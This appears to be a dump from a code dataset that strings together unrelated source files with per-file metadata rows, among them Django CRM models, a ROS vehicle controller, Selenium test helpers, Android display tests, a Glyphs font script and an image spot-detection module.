name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
category = models.CharField(_("Category"), max_length=10, choices=utils.ACC_CATEGORY, help_text='Required',)
slug = models.SlugField(unique=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="parent_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
def __str__(self):
return self.name
class Meta:
ordering = ["name"]
verbose_name = 'Parent Account'
verbose_name_plural = 'Parent Accounts'
objects = models.Manager() # The default manager.
active = ActiveParentManager() # Custom manager.
class ActiveAccountsManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class Account(models.Model):
name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
country = models.CharField(_("Country"), max_length=30, choices=utils.COUNTRIES, help_text='Required')
industry = models.CharField(_("Industry"), max_length=255, choices=utils.ACC_INDUSTRY, help_text='Required')
parent_account = models.ForeignKey(ParentAccount, related_name="account_parent_account", on_delete=models.PROTECT, help_text='Required')
slug = models.SlugField(unique=True)
status = models.CharField(_("Status"), max_length=15, choices=utils.ACC_STATUS, default="Prospect", help_text='Required')
address = models.CharField(_("Address"), max_length=255, blank=True, null=True)
website = models.URLField(_("Website"), blank=True, null=True)
description = models.TextField(blank=True, null=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="account_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
contacts = models.ManyToManyField(Contact, related_name="account_contacts", blank=True)
assigned_to = models.ForeignKey(User, related_name="account_assigned_user", on_delete=models.PROTECT)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("accounts:detail", args=[self.slug])
class Meta:
ordering = ["status"]
verbose_name = 'Account'
objects = models.Manager() # The default manager.
active = ActiveAccountsManager() # Custom manager.
| 42.092105
| 140
| 0.736168
| 2,879
| 0.899969
| 0
| 0
| 0
| 0
| 0
| 0
| 494
| 0.154423
|
91f3e934e2bf21d69c8e84878b0f0bb1bc0e52af
| 104
|
py
|
Python
|
Courses/HSEPython/8 week/5.py
|
searayeah/sublime-snippets
|
deff53a06948691cd5e5d7dcfa85515ddd8fab0b
|
[
"MIT"
] | null | null | null |
Courses/HSEPython/8 week/5.py
|
searayeah/sublime-snippets
|
deff53a06948691cd5e5d7dcfa85515ddd8fab0b
|
[
"MIT"
] | null | null | null |
Courses/HSEPython/8 week/5.py
|
searayeah/sublime-snippets
|
deff53a06948691cd5e5d7dcfa85515ddd8fab0b
|
[
"MIT"
] | null | null | null |
from functools import reduce
print(reduce(lambda x, y: x * (y**5), list(map(int, input().split())), 1))
| 34.666667
| 74
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
91f411263bdba1a973d2748f05c7f918cdbad645
| 1,176
|
py
|
Python
|
ros/src/twist_controller/twist_controller.py
|
SunshengGu/CarND-capstone-team-roboturtles
|
6ceb896f5af095223910a8366b0747a4c0bba910
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/twist_controller.py
|
SunshengGu/CarND-capstone-team-roboturtles
|
6ceb896f5af095223910a8366b0747a4c0bba910
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/twist_controller.py
|
SunshengGu/CarND-capstone-team-roboturtles
|
6ceb896f5af095223910a8366b0747a4c0bba910
|
[
"MIT"
] | 2
|
2019-02-05T02:55:57.000Z
|
2019-02-10T20:12:41.000Z
|
from yaw_controller import YawController
from pid import PID
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
def __init__(self, wheel_base, steer_ratio,max_lat_accel,max_steer_angle, accel_limit,decel_limit):
self.yaw = YawController(wheel_base, steer_ratio, 0., max_lat_accel, max_steer_angle)
self.steer = 0.0
self.throttle = 0.0
self.brake = 0.0
self.kp = 0.9
self.ki = 0.01
self.kd = 0.4
self.mn = decel_limit
self.mx = 0.5
self.pid = PID(self.kp,self.ki,self.kd ,self.mn,self.mx)
self.accel =None
def control(self,lin_vel,ang_vel,curr_vel,sample_time,vehicle_mass, wheel_radius,dbw):
self.steer = self.yaw.get_steering(lin_vel,ang_vel,curr_vel)
error = lin_vel- curr_vel
if lin_vel == 0 and curr_vel ==0:
self.throttle = 0
self.brake = 700 #prevent rolling forward
if dbw:
accel_target =self.pid.step(error,sample_time )
if accel_target >=0 :
self.throttle = accel_target
self.brake = 0.0
else:
self.throttle = 0.0
self.brake = -accel_target*vehicle_mass*wheel_radius
return self.throttle, self.brake, self.steer
| 25.021277
| 104
| 0.681973
| 1,071
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.021259
|
91f45538afa3b794621cc7c469da195bbca2956a
| 627
|
py
|
Python
|
samples/cordic/cordic_golden.py
|
hj424/heterocl
|
e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b
|
[
"Apache-2.0"
] | 236
|
2019-05-19T01:48:11.000Z
|
2022-03-31T09:03:54.000Z
|
samples/cordic/cordic_golden.py
|
hj424/heterocl
|
e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b
|
[
"Apache-2.0"
] | 248
|
2019-05-17T19:18:36.000Z
|
2022-03-30T21:25:47.000Z
|
samples/cordic/cordic_golden.py
|
hj424/heterocl
|
e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b
|
[
"Apache-2.0"
] | 85
|
2019-05-17T20:09:27.000Z
|
2022-02-28T20:19:00.000Z
|
import numpy as np
golden = np.array([
[100.0, 100.0],
[206.226840616, 179.610387213],
[1190.25124092, 1197.15702025],
[1250.76639667, 1250.3933971],
[1261.76760093, 1250.17718583],
[1237.4846285, 1237.56490579],
[1273.56730356, 1266.82141705],
[1272.899992, 1259.92589118],
[1.17000308922e-06, 1.21115462165e-06],
[4.69048419035e-08, 5.61093645301e-08],
[1.50244060584e-09, 2.44292250731e-09],
[8.47391624349e-11, 1.15593790738e-10],
[5.10649970307e-12, 4.80114236959e-12],
[8.34326950279e-13, 4.1368839091e-13],
[3.66142109259e-14, 4.95319932219e-14],
[8.20801944862e-15, 4.94154683061e-14]])
| 31.35
| 41
| 0.700159
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
91f4996456aabf6bbe1ac697a26d604a9883879d
| 98
|
py
|
Python
|
src/game_client/conf.py
|
adapiekarska/network-pong
|
c6a88b66570f26aea9c9976eb16953c480b846ec
|
[
"MIT"
] | 2
|
2018-11-14T17:25:24.000Z
|
2019-12-09T17:57:30.000Z
|
src/game_client/conf.py
|
adapiekarska/network-pong
|
c6a88b66570f26aea9c9976eb16953c480b846ec
|
[
"MIT"
] | null | null | null |
src/game_client/conf.py
|
adapiekarska/network-pong
|
c6a88b66570f26aea9c9976eb16953c480b846ec
|
[
"MIT"
] | null | null | null |
"""
User configuration file for the client.
"""
SERVER_ADDRESS = "127.0.0.1"
SERVER_PORT = 50000
| 14
| 39
| 0.704082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 58
| 0.591837
|
91f534930f8a5265738ba0e1d6c22b1ba0b55ac6
| 3,479
|
py
|
Python
|
build/lib/Element/Element.py
|
sunnyyukaige/APP_automation_core
|
b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4
|
[
"MIT"
] | null | null | null |
build/lib/Element/Element.py
|
sunnyyukaige/APP_automation_core
|
b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4
|
[
"MIT"
] | null | null | null |
build/lib/Element/Element.py
|
sunnyyukaige/APP_automation_core
|
b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4
|
[
"MIT"
] | null | null | null |
from selenium.common.exceptions import WebDriverException, NoSuchElementException
from Element.Waitor import Waitor
from Element.Find import Find
from Utilitys.WaitUtils import WaitUtils
class Element(Find):
def __init__(self, driver):
Find.__init__(self)
self.driver = driver
self.interval = 0.5
self.timeout = 20
def wait_for(self):
return Waitor(self, self.interval, self.timeout)
def get_interval(self):
return self.interval
def get_timeout(self):
return self.timeout
def set_interval(self, interval):
self.interval = interval
def set_timeout(self, timeout):
self.timeout = timeout
def find_element_click(self, by, value):
try:
self.driver.find_element(by, value).click()
except Exception as handleRetry:
try:
WaitUtils.wait_for_element_clickable(self.driver, by, value)
self.driver.find_element(by, value).click()
except Exception as e:
raise e
def find_element_sendkeys(self, by, value, keys):
try:
self.driver.find_element(by, value).send_keys(keys)
except Exception as handleRetry:
try:
WaitUtils.wait_for_element_visible(self.driver, by, value)
self.driver.find_element(by, value).send_keys(keys)
except Exception as e:
raise e
def find_element_set_value(self, by, value, keys):
try:
self.driver.find_element(by, value).set_value(keys)
except Exception as handleRetry:
try:
WaitUtils.wait_for_element_visible(self.driver, by, value)
self.driver.find_element(by, value).set_value(keys)
except Exception as e:
raise e
def drag_and_drop(self, origin_el, destination_el):
pass
def element_exist(self, by, value):
try:
self.driver.find_element(by, value)
return True
except Exception as handleRetry:
try:
WaitUtils.wait_for_element_present(self.driver, by, value)
self.driver.find_element(by, value)
except Exception as e:
raise e
def visible(self,by, value):
try:
return self.driver().find_element(by, value).is_displayed()
except Exception as handleRetry:
try:
self._refresh()
return self.driver().find_element(by, value).is_displayed()
except Exception as e:
return False
def clear(self, by, value):
try:
self.driver().find_element(by, value).clear()
except Exception as handleRetry:
try:
self.wait_for().visible()
self.driver().find_element(by, value).clear()
except Exception as e:
raise NoSuchElementException
def find_elements(self, by, value, number=1):
try:
if len(self.driver.find_elements(by, value)) >= number:
return self.driver.find_elements(by, value)
else:
raise Exception
except Exception as handleRetry:
self._refresh()
WaitUtils.wait_for_elements_number_right(self.driver, by, value, number)
return self.driver.find_elements(by, value)
# TODO: We need to wrap more method here.
| 32.514019
| 84
| 0.596148
| 3,289
| 0.945387
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.011785
|
91f55da34b50862c7008aa6fdd44283def33131b
| 2,047
|
py
|
Python
|
config/settings/prd.py
|
zhenghuihu/django-skeleton
|
548019b2f5826593f2f270c96f8b14ec19280c51
|
[
"MIT"
] | null | null | null |
config/settings/prd.py
|
zhenghuihu/django-skeleton
|
548019b2f5826593f2f270c96f8b14ec19280c51
|
[
"MIT"
] | null | null | null |
config/settings/prd.py
|
zhenghuihu/django-skeleton
|
548019b2f5826593f2f270c96f8b14ec19280c51
|
[
"MIT"
] | null | null | null |
'''
production setting
'''
# include all base settings
from .base import * # pylint: disable=W0401,W0614
# include credentials (not included in repo)
from . import credentials as crd # pylint: disable=W0401,W0611
# disable debugging
DEBUG = False
# ========================
# SECRET_KEY
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-SECRET_KEY
# ========================
SECRET_KEY = crd.SECRET_KEY
# ========================
# STATIC_ROOT
# Collect static files here
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-STATIC_ROOT
# ========================
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'run', 'static')
# ========================
# Database override
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# ========================
#DATABASES = {
# 'default': {
# }
#}
# ========================
# logging configuration
# https://docs.djangoproject.com/en/1.10/topics/logging/
# ========================
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)-8s %(asctime)s %(module)-10s %(message)s',
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'file': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join(PROJECT_ROOT, 'run', 'django.log'),
'maxBytes': 10*1000*1000, # 10M
'backupCount': 3,
'formatter': 'verbose',
},
},
'loggers': {
'': {
'handlers': ['file'],
'propagate': True,
'level': 'INFO',
},
'django': {
'handlers': ['file',],
'propagate': True,
'level': 'INFO',
},
},
}
| 25.911392
| 78
| 0.484123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,296
| 0.633122
|
91f69a518f7a745cba0d44a46ab85227b8ebc8dd
| 636
|
py
|
Python
|
8. str_range/test_solution.py
|
dcragusa/WeeklyPythonExerciseB2
|
a7da3830e27891060dcfb0804c81f52b1f250ce8
|
[
"MIT"
] | null | null | null |
8. str_range/test_solution.py
|
dcragusa/WeeklyPythonExerciseB2
|
a7da3830e27891060dcfb0804c81f52b1f250ce8
|
[
"MIT"
] | null | null | null |
8. str_range/test_solution.py
|
dcragusa/WeeklyPythonExerciseB2
|
a7da3830e27891060dcfb0804c81f52b1f250ce8
|
[
"MIT"
] | null | null | null |
from solution import str_range
def test_same_start_end():
r = str_range('a', 'a')
assert iter(r) == r
assert ''.join(list(r)) == 'a'
def test_simple():
r = str_range('a', 'c')
assert ''.join(list(r)) == 'abc'
def test_simple_with_step():
r = str_range('a', 'c', 2)
assert ''.join(list(r)) == 'ac'
def test_simple_with_negativestep():
r = str_range('c', 'a', -2)
assert ''.join(list(r)) == 'ca'
def test_hebrew():
r = str_range('א', 'ז', 2)
assert ''.join(list(r)) == 'אגהז'
test_same_start_end()
test_simple()
test_simple_with_step()
test_simple_with_negativestep()
test_hebrew()
| 18.171429
| 37
| 0.606918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 68
| 0.105919
|
91f6f8ff0e9840449fba337706ce6b583a980630
| 8,227
|
py
|
Python
|
acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py
|
wangji1/test-framework-and-suites-for-android
|
59564f826f205fe7fab64f45b88b1a6dde6900af
|
[
"Apache-2.0"
] | 8
|
2018-09-14T01:34:01.000Z
|
2021-07-01T02:00:23.000Z
|
acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py
|
wangji1/test-framework-and-suites-for-android
|
59564f826f205fe7fab64f45b88b1a6dde6900af
|
[
"Apache-2.0"
] | 3
|
2019-09-10T11:39:50.000Z
|
2019-10-10T08:26:22.000Z
|
acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py
|
wangji1/test-framework-and-suites-for-android
|
59564f826f205fe7fab64f45b88b1a6dde6900af
|
[
"Apache-2.0"
] | 9
|
2018-10-11T15:14:03.000Z
|
2021-02-17T11:37:20.000Z
|
'''
Copyright (C) 2018 Intel Corporation
?
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
?
http://www.apache.org/licenses/LICENSE-2.0
?
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
?
SPDX-License-Identifier: Apache-2.0
'''
import re
import math
import time
from testlib.util.common import g_common_obj
from testlib.graphics.common import window_info
class DisplayMetricsReportImpl(object):
""" DisplayMetricsReportImpl """
DUMPSYS_CMD = "dumpsys display|grep DisplayDeviceInfo"
GET_SIZE = "wm size"
GET_DENSITY = "wm density"
density_range = [120, 160, 213, 240, 280, 320, 360, 400, 420, 480, 560, 640]
flag = False
def __init__(self):
self.device = g_common_obj.get_device()
def __get_dumpsys_size(self):
"""
run commands 'adb shell dumpsys | grep DisplayDeviceInfo' to get dumpsys size,such as 1280 x 800
"""
msg = g_common_obj.adb_cmd_capture_msg(repr(self.DUMPSYS_CMD))
m = re.search(r'\d+\s*x\s*\d+', msg)
dumpsys_size = m.group()
return dumpsys_size
def get_dumpsys_hight(self):
dumpsys_size = self.__get_dumpsys_size()
size_list = dumpsys_size.split(" ")
if len(size_list) > 0:
dumpsys_hight = int(size_list[0].strip())
return dumpsys_hight
else:
assert len(size_list) > 0, "[FAILURE] dumpsys high is %s" % size_list
def get_dumpsys_width(self):
dumpsys_size = self.__get_dumpsys_size()
size_list = dumpsys_size.split(" ")
if len(size_list) > 0:
dumpsys_width = int(size_list[2].strip())
return dumpsys_width
else:
assert len(size_list) > 0, "[FAILURE] dumpsys width is %s" % size_list
def __get_size(self):
"""
run commands 'adb shell wm size ' to get real size
"""
output = g_common_obj.adb_cmd_capture_msg(repr(self.GET_SIZE))
m = re.search(r'Physical size:\s*\w+x\w+', output)
size = m.group().split(":")[1].strip()
return size
def get_hight(self):
size = self.__get_size()
size_list = size.split("x")
if len(size_list) > 0:
height = int(size_list[0])
return height
else:
assert len(size_list) > 0, "[FAILURE] size list is %s" % size_list
def get_width(self):
size = self.__get_size()
size_list = size.split("x")
if len(size_list) > 0:
width = int(size_list[1])
return width
else:
assert len(size_list) > 0, "[FAILURE] size list is %s" % size_list
def compare_dumpsys_size_with_real_size(self):
"""
compare dumpsys size with real size
"""
dumpsys_hight = self.get_dumpsys_hight()
hight = self.get_hight()
dumpsys_width = self.get_dumpsys_width()
width = self.get_width()
print("[Debug] dumpsys_hight is %s,real height is %s" % (dumpsys_hight, hight))
print("[Debug] dumpsys_width is %s,real width is %s" % (dumpsys_width, width))
assert dumpsys_hight == hight and dumpsys_hight >= 600, \
"[FAILURE] dumpsys hight is not equal to real hight:dumpsys hight is %d,real hight is %d"\
% (dumpsys_hight, hight)
assert dumpsys_width == width and dumpsys_width >= 600, \
"[FAILURE] dumpsys width is not equal to real width:dumpsys width is %d,real width is %d"\
% (dumpsys_width, width)
def compare_dumpsys_density_with_real_density(self):
"""
compare dumpsys density with real density
"""
dumpsys_density = window_info.get_dumpsys_density()
density = window_info.get_wm_density()
print("[Debug] dumpsys_density is %s,real density is %s" % (dumpsys_density, density))
assert dumpsys_density == density and dumpsys_density > 0, \
"[FAILURE] dumpsys density is not equal to real density:dumpsys density is %d,real density is %d"\
% (dumpsys_density, density)
def judge_density_in_range(self):
"""
judge if dumpsys density is in [120,160,213,240,280,320,360,400,480,560,640]
"""
dumpsys_density = window_info.get_dumpsys_density()
print("[Debug] dumpsys_density is %s,density range is %s" % (dumpsys_density, self.density_range))
for i in range(0, int(len(self.density_range))):
if dumpsys_density == int(self.density_range[i]):
self.flag = True
break
assert self.flag, \
"[FAILURE] dumpsys_density is not in density_range, dumpsys_density is %d" % dumpsys_density
def judge_dpi(self):
"""
judge if dumpsys density is closest to the dumpsys dpi,171.235 x 439.351 dpi
"""
min = 0
closest_density = 0
dumpsys_dpi = window_info.get_dumpsys_dpi()
dumpsys_dpi_x = float(dumpsys_dpi.split(" ")[0].strip())
dumpsys_dpi_y = float(dumpsys_dpi.split(" ")[2].strip())
dumpsys_hight = self.get_dumpsys_hight()
dumpsys_width = self.get_dumpsys_width()
denominator = math.sqrt((dumpsys_hight / dumpsys_dpi_x) ** 2 + (dumpsys_width / dumpsys_dpi_y) ** 2)
numerator = math.sqrt(dumpsys_hight ** 2 + dumpsys_width ** 2)
dumpsys_dpi = numerator / denominator
print("dumpsys_dpi is %s" % dumpsys_dpi)
dumpsys_density = window_info.get_dumpsys_density()
for i in range(0, len(self.density_range)):
if i == 0:
min = abs(dumpsys_dpi - self.density_range[i])
tmp = abs(dumpsys_dpi - self.density_range[i])
if tmp <= min:
min = tmp
closest_density = self.density_range[i]
print("[Debug] closest density is %s" % (closest_density))
assert closest_density == dumpsys_density, \
"[FAILURE]the dumpsys_density is not the closest to dumpsys dpi,the closest density is %s )"\
% closest_density
def compare_refresh_rate(self):
msg = g_common_obj.adb_cmd_capture_msg(repr(self.DUMPSYS_CMD))
m = re.search(r'\d+.\d+\s*fps', msg)
if m is not None:
refresh_rate = float(m.group().strip().split(" ")[0])
diff = abs(refresh_rate - 60)
print("[Debug] diff is %s" % diff)
assert diff < 1, "[FAILURE] The value of string freshRate is %s ,greater(less) than 60." % refresh_rate
def check_display(self):
output = g_common_obj.adb_cmd_capture_msg("dumpsys window | grep mScreenOn")
assert output.find("mScreenOnFully=false") != -1, "[FAILURE] Display is still on after time-out."
print("[Debug] screen status is %s" % output)
time.sleep(1)
out = g_common_obj.adb_cmd_capture_msg("dumpsys display |grep mActualBacklight")
if out is not None:
actualBacklight = int(out.split("=")[1])
print("[Debug] actual back light is %s" % actualBacklight)
assert actualBacklight == 0, "[FAILURE] Device backlight not dim out after time-out."
def calculate_screen_aspect_ratio(self):
width = window_info.get_wm_width()
hight = window_info.get_wm_hight()
if width > hight:
ratio = float(width) / hight
else:
ratio = float(hight) / width
assert ratio > 1.3333 and ratio < 1.86,\
"[FAILURE]The screen ratio is not right,it shold be between 1.3333 and 1.86,but now it is %s" % ratio
def check_color_depth(self):
output = g_common_obj.adb_cmd_capture_msg("dumpsys SurfaceFlinger | grep 'FB TARGET'")
print("[Debug] FB TARGET is %s" % output)
assert output.find("8888") != -1, "[FAILURE] The format of this layer is not BGRA_8888."
d_metricsreport_impl = DisplayMetricsReportImpl()
| 41.550505
| 115
| 0.629999
| 7,437
| 0.903975
| 0
| 0
| 0
| 0
| 0
| 0
| 2,678
| 0.325514
|
91f92403a6d2b5956cbf468fe884187f6c555b2a
| 3,811
|
py
|
Python
|
Anchors/Find and Replace in Anchor Names.py
|
juandelperal/Glyphs-Scripts
|
1f3cb71683ec044dff67a46cd895773e8271effa
|
[
"Apache-2.0"
] | null | null | null |
Anchors/Find and Replace in Anchor Names.py
|
juandelperal/Glyphs-Scripts
|
1f3cb71683ec044dff67a46cd895773e8271effa
|
[
"Apache-2.0"
] | null | null | null |
Anchors/Find and Replace in Anchor Names.py
|
juandelperal/Glyphs-Scripts
|
1f3cb71683ec044dff67a46cd895773e8271effa
|
[
"Apache-2.0"
] | null | null | null |
#MenuTitle: Find And Replace In Anchor Names
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
from builtins import str
__doc__="""
Replaces strings in anchor names of all selected glyphs.
"""
import vanilla
class SearchAndReplaceInAnchorNames( object ):
def __init__( self ):
# Window 'self.w':
windowWidth = 520
windowHeight = 58
windowWidthResize = 0 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
( windowWidth, windowHeight ), # default window size
"Search And Replace In Anchor Names", # window title
minSize = ( windowWidth, windowHeight ), # minimum size (for resizing)
maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
autosaveName = "com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow" # stores last window position and size
)
# UI elements:
self.w.textSearch = vanilla.TextBox((15, 12+2, 67, 14), "Search for:", sizeStyle='small')
self.w.searchFor = vanilla.EditText((15+67, 12, 135, 19), "tip", sizeStyle='small')
self.w.textReplace = vanilla.TextBox((225, 12+2, 67, 14), "Replace by:", sizeStyle='small')
self.w.replaceBy = vanilla.EditText((225+67, 12, 135, 19), "top", sizeStyle='small')
self.w.replaceButton = vanilla.Button((-80, 12+1, -15, 17), "Replace", sizeStyle='small', callback=self.SearchAndReplaceInAnchorNamesMain)
self.w.setDefaultButton( self.w.replaceButton )
# Load Settings:
if not self.LoadPreferences():
print("Note: 'Search And Replace In Anchor Names' could not load preferences. Will resort to defaults")
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def SavePreferences( self, sender ):
try:
Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"] = self.w.searchFor.get()
Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"] = self.w.replaceBy.get()
except:
return False
return True
def LoadPreferences( self ):
try:
self.w.searchFor.set( Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"] )
self.w.replaceBy.set( Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"] )
except:
return False
return True
def SearchAndReplaceInAnchorNamesMain( self, sender ):
try:
searchString = self.w.searchFor.get()
replaceString = self.w.replaceBy.get()
thisFont = Glyphs.font # frontmost font
listOfSelectedLayers = thisFont.selectedLayers # active layers of currently selected glyphs
for thisLayer in listOfSelectedLayers: # loop through layers
thisGlyph = thisLayer.parent
reportString = "Anchors renamed in %s:" % thisGlyph.name
displayReportString = False
for thisGlyphLayer in thisGlyph.layers:
for thisAnchor in thisGlyphLayer.anchors:
oldAnchorName = thisAnchor.name
newAnchorName = oldAnchorName.replace( searchString, replaceString )
if oldAnchorName != newAnchorName:
thisAnchor.setName_( newAnchorName )
reportString += "\n layer '%s': %s > %s" % ( thisGlyphLayer.name, oldAnchorName, newAnchorName )
displayReportString = True
if displayReportString:
print(reportString)
if not self.SavePreferences( self ):
print("Note: 'Search And Replace In Anchor Names' could not write preferences.")
self.w.close() # delete if you want window to stay open
except Exception as e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print("Search And Replace In Anchor Names Error: %s" % e)
# brings macro window to front and clears its log:
Glyphs.clearLog()
Glyphs.showMacroWindow()
SearchAndReplaceInAnchorNames()
| 37.732673
| 140
| 0.724482
| 3,432
| 0.900551
| 0
| 0
| 0
| 0
| 0
| 0
| 1,291
| 0.338756
|
91fa4adf813afeff4ee8cff082ebb2bd99d4723f
| 269
|
py
|
Python
|
Python3/Coursera/003_quadratic_roots/solution.py
|
neon1ks/Study
|
5d40171cf3bf5e8d3a95539e91f5afec54d1daf3
|
[
"MIT"
] | null | null | null |
Python3/Coursera/003_quadratic_roots/solution.py
|
neon1ks/Study
|
5d40171cf3bf5e8d3a95539e91f5afec54d1daf3
|
[
"MIT"
] | null | null | null |
Python3/Coursera/003_quadratic_roots/solution.py
|
neon1ks/Study
|
5d40171cf3bf5e8d3a95539e91f5afec54d1daf3
|
[
"MIT"
] | null | null | null |
import sys
import math
if __name__ == '__main__':
a = int(sys.argv[1])
b = int(sys.argv[2])
c = int(sys.argv[3])
d = b * b - 4 * a * c
x1 = (-b + math.sqrt(d)) / (2 * a)
x2 = (-b - math.sqrt(d)) / (2 * a)
print(int(x1))
print(int(x2))
| 19.214286
| 38
| 0.472119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.037175
|
91fb5d86e0a2ace17209d7b5be31f349a8d3fe5f
| 2,258
|
py
|
Python
|
bigstream/features.py
|
wangyuhan01/bigstream
|
3cd2e4b217639d09b5e2dd0e169a7c210d9cacef
|
[
"MIT"
] | 14
|
2021-03-10T12:52:02.000Z
|
2022-03-14T19:46:03.000Z
|
bigstream/features.py
|
wangyuhan01/bigstream
|
3cd2e4b217639d09b5e2dd0e169a7c210d9cacef
|
[
"MIT"
] | 6
|
2021-02-24T18:15:34.000Z
|
2021-12-08T16:58:06.000Z
|
bigstream/features.py
|
wangyuhan01/bigstream
|
3cd2e4b217639d09b5e2dd0e169a7c210d9cacef
|
[
"MIT"
] | 6
|
2021-01-20T03:57:14.000Z
|
2022-02-04T22:16:46.000Z
|
import numpy as np
from fishspot.filter import white_tophat
from fishspot.detect import detect_spots_log
def blob_detection(
image,
min_blob_radius,
max_blob_radius,
**kwargs,
):
"""
"""
wth = white_tophat(image, max_blob_radius)
spots = detect_spots_log(
wth,
min_blob_radius,
max_blob_radius,
**kwargs,
).astype(int)
intensities = image[spots[:, 0], spots[:, 1], spots[:, 2]]
return np.hstack((spots[:, :3], intensities[..., None]))
def get_spot_context(image, spots, vox, radius):
"""
"""
output = []
for spot in spots:
s = (spot/vox).astype(int)
w = image[s[0]-radius:s[0]+radius+1,
s[1]-radius:s[1]+radius+1,
s[2]-radius:s[2]+radius+1]
output.append( [spot, w] )
return output
def _stats(arr):
"""
"""
# compute mean and standard deviation along columns
arr = arr.astype(np.float64)
means = np.mean(arr, axis=1)
sqr_means = np.mean(np.square(arr), axis=1)
stddevs = np.sqrt( sqr_means - np.square(means) )
return means, stddevs
def pairwise_correlation(A, B):
"""
"""
# grab and flatten context
a_con = np.array( [a[1].flatten() for a in A] )
b_con = np.array( [b[1].flatten() for b in B] )
# get means and std for all contexts, center contexts
a_mean, a_std = _stats(a_con)
b_mean, b_std = _stats(b_con)
a_con = a_con - a_mean[..., None]
b_con = b_con - b_mean[..., None]
# compute pairwise correlations
corr = np.matmul(a_con, b_con.T)
corr = corr / a_std[..., None]
corr = corr / b_std[None, ...]
corr = corr / a_con.shape[1]
# contexts with no variability are nan, set to 0
corr[np.isnan(corr)] = 0
return corr
def match_points(A, B, scores, threshold):
"""
"""
# split positions from context
a_pos = np.array( [a[0] for a in A] )
b_pos = np.array( [b[0] for b in B] )
# get highest scores above threshold
best_indcs = np.argmax(scores, axis=1)
a_indcs = range(len(a_pos))
keeps = scores[(a_indcs, best_indcs)] > threshold
# return positions of corresponding points
return a_pos[keeps, :3], b_pos[best_indcs[keeps], :3]
| 24.27957
| 62
| 0.59566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 372
| 0.164748
|
91fc1d22637f7a669f85b81d4edd4e86d5957148
| 8,736
|
py
|
Python
|
.ycm_extra_conf.py
|
zaucy/bazel-compilation-database
|
aa58494efdf31c3e3525832b3d44d48bb3bc2b0b
|
[
"Apache-2.0"
] | 1
|
2021-04-23T03:47:31.000Z
|
2021-04-23T03:47:31.000Z
|
.ycm_extra_conf.py
|
tsingakbar/bazel-compilation-database
|
a1d592dd8c3423c7fe94933ead4f098353ad4436
|
[
"Apache-2.0"
] | null | null | null |
.ycm_extra_conf.py
|
tsingakbar/bazel-compilation-database
|
a1d592dd8c3423c7fe94933ead4f098353ad4436
|
[
"Apache-2.0"
] | 1
|
2020-11-14T00:11:51.000Z
|
2020-11-14T00:11:51.000Z
|
#!/usr/bin/python
# Copyright 2018 GRAIL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
